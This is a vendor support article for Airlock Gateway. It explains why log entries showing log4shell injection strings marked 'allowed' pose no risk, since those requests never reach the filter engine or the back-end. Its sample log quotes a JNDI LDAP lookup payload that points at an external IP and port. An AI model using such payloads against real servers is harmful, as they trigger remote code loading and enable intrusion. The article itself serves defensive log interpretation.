You are here
Injections like log4shell that might have passed the Deny Rules filters
Last update on 14. February 2022 - 17:04.
Airlock Gateway logs certain requests with attack strings in the HTTP path or in other fields with action "allowed" if the request could not be completed (e.g. was aborted by the client during transmission). Below a log entry example of such a request.
...
"entry_url": "https://gateway.airlock.com/${jndi:ldap:/124.150.96.246:1389/Exploit}",
"entry_path": "/${jndi:ldap:/124.150.96.246:1389:1389/Exploit}"
...
"action": "allowed",
...
"backend_url": "<n/a>",
...
Note that the "backend_url" field is set to "<n/a>" and that the field "time_filter" is not set at all which means that the request was never processed by the filter engine (Deny Rules). Such requests are NOT forwarded to the back-end and are therefore not a security risk.
no action required.